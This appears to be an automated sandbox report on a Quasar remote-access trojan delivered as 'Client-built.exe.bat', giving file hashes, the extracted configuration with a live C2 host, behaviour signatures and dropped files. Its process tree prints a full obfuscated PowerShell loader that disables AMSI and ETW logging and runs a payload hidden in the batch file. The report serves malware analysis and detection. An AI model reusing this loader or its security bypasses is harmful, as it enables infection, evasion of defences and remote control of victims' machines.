Analysis

  • max time kernel
    112s
  • max time network
    129s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    25-11-2024 23:23

General

  • Target

    Client-built.exe.bat

  • Size

    4.2MB

  • MD5

    8eecabd958ac81525f071d8f8f9c5b4f

  • SHA1

    293f0625c5eafc5193d582244603d5981c5c6ef5

  • SHA256

    8c0ed0a2488582fa19983c458e298b76bad3f81402da794f55d4b5adbf101db3

  • SHA512

    3ecc3d4a22fd945777eea8ca732c3009ca65bc0e44ea388e0602db500da2f20ef2d465ef107a79595ea3f5c89eccbf634fcbb7fb46197a8513a6317450b80704

  • SSDEEP

    49152:B78bwAn48Himx5yYfP0z1TjhIkgbN+7fSnndvcW:a

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

fr

C2

kdotisbetterfr.airdns.org:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes
  • encryption_key

    A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses a powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';${kdoTkq`Gent`Obgn}=([SyStEm.TexT.eNcODING]::uTF8.GETstrING((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SYStEm.TeXT.ENCoDING]::UTf8.geTstrINg((65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 65, 109, 115, 105, 85)) + [SyStem.teXT.ENcoDIng]::uTF8.geTSTRinG([SYsTEM.cOnvErT]::FRoMbase64StRing('dGlscw==')));${kdOtmftjtoczLt}=([SySTEM.TEXT.encoDing]::UTF8.gEtsTrING([SyStEm.ConVerT]::frOMBASe64stRing('YW1zaUluaXRGYWlsZWQ=')));$kdOtrBXZtJMXwe=[REF].aSSEmBly;${k`D`OtinuLtqZ`Mj`I}=$kdotrBXztjMxwe.GettyPE(${k`D`OtkqgeNto`B`Gn});${KDotvlLHOtMVOT}=${kDO`Tinultqz`MJI}.GEtfiEld(${k`Dotmf`TJtOCZLt},([syStEm.Text.ENcoDiNG]::Utf8.getStrING([SyStEm.CONVeRt]::fRomBase64STriNG('Tm9uUHVibGljLFN0YXRpYw=='))));${kdotv`Ll`H`Otm`Vot}.SETVAluE($nULL,(([MaTh]::roUnd([maTH]::Pi) -eq (4583 - 4580))));([REFLEcTIon.aSSembly]::LOaDwITHpaRtIAlnAMe(((([systeM.tEXT.EnCoDinG]::UTf8.gEtSTRING((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).geTtyPe(((([sYStEm.TeXT.encodING]::utf8.GETsTRINg((0x53, 0x79, 0x73, 116, 101, 109, 46, 68, 105, 0x61, 103, 110, 111, 115, 0x74, 0x69, 99, 115, 0x2e, 0x45)) + [SystEM.TEXt.EncOdInG]::UTF8.GEtstRINg([sysTEM.coNVert]::frOMbAse64stRInG('dmVudGluZy5FdmVudFByb3ZpZGVy')))))).gEtFIELD(((([sYStem.teXt.EnCodIng]::uTf8.gETsTRING((0x6d, 0x5f, 101, 110)) + [sYstEm.Text.ENcodInG]::UTf8.getsTRinG([sYSTeM.cONVERT]::FromBase64STring('YWJsZQ==')) + [system.text.EnCOdiNG]::utF8.GETStRinG((100))))),((([sySTEM.tExT.eNcodInG]::Utf8.GeTstrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x49, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x63, 0x65)))))).seTvALue([ref].AssEMBlY.gETtyPE(((([sysTem.tEXT.ENCOdiNg]::utF8.gETString((0x53, 121, 115, 0x74, 0x65, 109, 0x2e, 77, 97, 110, 0x61, 0x67, 0x65, 0x6d, 0x65, 110, 0x74, 46, 65, 0x75, 0x74, 0x6f, 0x6d, 0x61, 0x74, 105, 0x6f)) + 
[SyStEm.TEXT.eNcoding]::UtF8.getStRING((0x6e, 0x2e, 0x54, 0x72, 0x61, 0x63, 0x69, 0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).getfIEld(((([SYsTeM.tEXt.EncodIng]::utF8.getStriNg((0x65, 116, 0x77, 80, 0x72, 111, 118, 0x69, 0x64, 0x65, 0x72))))),((([syStem.TexT.enCodING]::uTf8.GETstrING([SystEM.CoNveRT]::FromBAse64StrIng('Tm9uUHVibGljLFN0YXRpYw==')))))).GEtVALUe($nUll),0));.([char](((-1880 -Band 3977) + (-1880 -Bor 3977) - 4958 + 2966))+[char](((-5904 -Band 9157) + (-5904 -Bor 9157) + 6302 - 9454))+[char](((-21634 -Band 6735) + (-21634 -Bor 6735) + 8883 + 6136))) ([teXt.EncOdiNG]::utf8.GeTsTRING([COnvERt]::FROmbaSE64striNg((.([char]((10951 - 6660 - 8049 + 3829))+[char]((14226 - 7595 - 9122 + 2592))+[char]((24730 - 8863 - 9864 - 5887))+[char](((-5132 -Band 1756) + (-5132 -Bor 1756) + 8940 - 5519))+[char](((1940 -Band 2956) + (1940 -Bor 2956) - 6449 + 1620))+[char](((-6729 -Band 3763) + (-6729 -Bor 3763) - 545 + 3622))+[char]((-4095 - 1385 + 928 + 4662))+[char]((-6662 - 1701 + 5421 + 3058))+[char](((-2558 -Band 9162) + (-2558 -Bor 9162) - 7234 + 731))+[char](((2844 -Band 3096) + (2844 -Bor 3096) - 1177 - 4653))+[char](((-16140 -Band 2909) + (-16140 -Bor 2909) + 8371 + 4976))) $kDot_file -raw | .([char]((6554 - 7231 + 5942 - 5182))+[char](((3079 -Band 9477) + (3079 -Bor 9477) - 9412 - 3043))+[char](((-4179 -Band 8133) + (-4179 -Bor 8133) - 5058 + 1212))+[char]((19429 - 6371 - 4893 - 8064))+[char](((-8637 -Band 6960) + (-8637 -Bor 6960) + 3708 - 1932))+[char]((-9407 - 2390 + 4965 + 6948))+[char]((3773 - 784 + 6348 - 9292))+[char](((-17685 -Band 7650) + (-17685 -Bor 7650) + 6965 + 3153))+[char]((-1848 - 3742 + 3489 + 2217))+[char](((-15472 -Band 7425) + (-15472 -Bor 7425) - 1465 + 9626))+[char]((1512 - 5248 + 8485 - 4644))+[char](((-10605 -Band 4896) + (-10605 -Bor 4896) + 4426 + 1393))+[char](((3437 -Band 468) + (3437 -Bor 468) + 5827 - 9629))) (([sYSTEm.teXT.eNCODiNG]::utf8.gEtstRing(58)) + 
([sySteM.TeXT.ENcodiNg]::uTF8.gETstriNG([sYSTem.convERt]::fRomBasE64StRing('OktET1Q6OiguKik='))))).MaTcheS.GrOUPS[1].vAluE)))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mg4sfdpf\mg4sfdpf.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3984
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D98.tmp" "c:\Users\Admin\AppData\Local\Temp\mg4sfdpf\CSC7DE2ADD3D2546AE9748F67526E12FB.TMP"
          4⤵
            PID:2444

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES9D98.tmp

      Filesize

      1KB

      MD5

      65a199e8cd30e832bed23b27b3686e9a

      SHA1

      749566689c7916119af1c0f995bf092c38b32aa4

      SHA256

      6698f747fc70bdce86d640acbc1a0f7c1d092d4c4a5662f43d513ef5d7f36fbc

      SHA512

      b6eaf33ed66cbbae650af367dbb219dd5b7db21d032c67dd980bfbe992489edc7b1c3a1a221594df16a6f150bd5f73278416a9a47d84ab1e92116f5cd11623b2

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aclr0dr3.dxc.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\mg4sfdpf\mg4sfdpf.dll

      Filesize

      8KB

      MD5

      5b4cf77e1cf17b93d867513a8bed1498

      SHA1

      1475fec98495cd3376a708d3903152a53a9c6dc0

      SHA256

      af3b972f5bf309169cfbbdff77dfcf1683f2ff717e98305477c601f0b2180320

      SHA512

      bc9cae979b7d265944669064bd479165ab24e0959cd3d993e5e2d91943212cfc7fb10643401b76c83aef7d642eea6ac0d05aa93d060a3f4b0537eede9adfaba2

    • \??\c:\Users\Admin\AppData\Local\Temp\mg4sfdpf\CSC7DE2ADD3D2546AE9748F67526E12FB.TMP

      Filesize

      652B

      MD5

      acd44c83cb3fc41789ea87542434a352

      SHA1

      4420dcb31124d3334410569dc109b26a3c0b59bf

      SHA256

      0ce5cdb59ee9135653bc4a9cebceb4cdcb18d7c75b4542b95f04c0f785c7d240

      SHA512

      b5c333e7ff7e154e80b15a35db19d805306f20e1bf9653c5bf3273d0a682b5f0d5c63d5f434ce25965f78493bab650b76adb1b1e1bc945feceab1270a0de4f60

    • \??\c:\Users\Admin\AppData\Local\Temp\mg4sfdpf\mg4sfdpf.0.cs

      Filesize

      11KB

      MD5

      2baccf8bd40aaee5659a70165d301596

      SHA1

      52f6af554b3df57db81005dd6360f4bc39b93531

      SHA256

      6c6ca5f865d9346cd32d84e0122d1bf08051d8b53c47208cef44bd2bb6133884

      SHA512

      dfbe57879f918c029dc628cc27961d63eca88104e8e7fb3aba8c2d1696419d5010c2dfc7e690669835fa50a0344f1ec5f60f714db95112b18c8524e87d1bb51a

    • \??\c:\Users\Admin\AppData\Local\Temp\mg4sfdpf\mg4sfdpf.cmdline

      Filesize

      369B

      MD5

      e4da76533d98f44321cad556ff5dc299

      SHA1

      f39574afa7da3ce002784f1bd5fe516e8f00e901

      SHA256

      ae0ca955587ffdbeae96130e8c6f26602bbfbc6e4fca071d8dbce0f955d59393

      SHA512

      65c1cdeaef8d44d98fefdd58601e7ea768e27efabab77c3c3b312c5a158d5fd3fc549978b388503b7cf1534747e605027b1a3aa1b71b0ba8dab960389e5a9851

    • memory/2432-25-0x000002AAE4140000-0x000002AAE4148000-memory.dmp

      Filesize

      32KB

    • memory/2432-28-0x00007FFBA89E3000-0x00007FFBA89E5000-memory.dmp

      Filesize

      8KB

    • memory/2432-11-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

    • memory/2432-10-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

    • memory/2432-0-0x00007FFBA89E3000-0x00007FFBA89E5000-memory.dmp

      Filesize

      8KB

    • memory/2432-1-0x000002AAE4090000-0x000002AAE40B2000-memory.dmp

      Filesize

      136KB

    • memory/2432-27-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

    • memory/2432-12-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

    • memory/2432-29-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

    • memory/2432-30-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

    • memory/2432-31-0x000002AAFC8A0000-0x000002AAFCBC4000-memory.dmp

      Filesize

      3.1MB

    • memory/2432-32-0x000002AAFC6F0000-0x000002AAFC740000-memory.dmp

      Filesize

      320KB

    • memory/2432-33-0x000002AAFD080000-0x000002AAFD132000-memory.dmp

      Filesize

      712KB

    • memory/2432-34-0x000002AAFD310000-0x000002AAFD4D2000-memory.dmp

      Filesize

      1.8MB